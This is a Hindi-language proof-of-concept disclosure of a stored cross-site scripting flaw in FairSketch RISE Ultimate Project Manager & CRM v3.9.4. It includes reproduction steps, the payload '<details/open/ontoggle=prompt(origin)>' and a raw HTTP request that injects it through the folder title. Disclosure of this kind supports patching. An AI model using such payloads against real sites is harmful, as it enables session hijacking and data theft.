
FairSketch RISE अल्टीमेट प्रोजेक्ट मैनेजर और CRM v3.9.4 में संग्रहीत XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट, फ़ोल्डर शीर्षक इंजेक्शन के माध्यम से मनमाना JavaScript निष्पादन का प्रदर्शन।
FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) में फ़ाइल प्रबंधक कार्यक्षमता में एक संग्रहित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता पाई गई। यह भेद्यता title parameter में है जो नए फ़ोल्डर बनाते समय सबमिट किया जाता है। अपर्याप्त इनपुट सैनिटाइजेशन के कारण, हमलावर HTML/JavaScript payloads (जैसे, <details/open/ontoggle=prompt(origin)>) इंजेक्ट कर सकता है। पेलोड फ़ोल्डर के नाम में संग्रहित हो जाता है और फ़ाइल प्रबंधक में फ़ोल्डरों को सूचीबद्ध करते समय निष्पादित होता है, जिससे प्रभावित फ़ोल्डर को देखने वाले किसी भी उपयोगकर्ता के ब्राउज़र में मनमाना जावास्क्रिप्ट निष्पादन संभव होता है। इसके परिणामस्वरूप सत्र अपहरण और डेटा बहिर्गमन हो सकता है।
[!NOTE]
यह भेद्यता केवल व्यवस्थापक खातों तक सीमित नहीं है। इसे किसी भी उपयोगकर्ता खाते का उपयोग करके शोषित किया जा सकता है जिसके पास फ़ाइल प्रबंधक में नए फ़ोल्डर बनाने की अनुमति है।
वैध क्रेडेंशियल के साथ लॉगिन करें।
Files पर जाएँ

New Folder पर क्लिक करें

Title फ़ील्ड में नीचे दिया गया पेलोड दर्ज करें:
<details/open/ontoggle=prompt(origin)>


POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E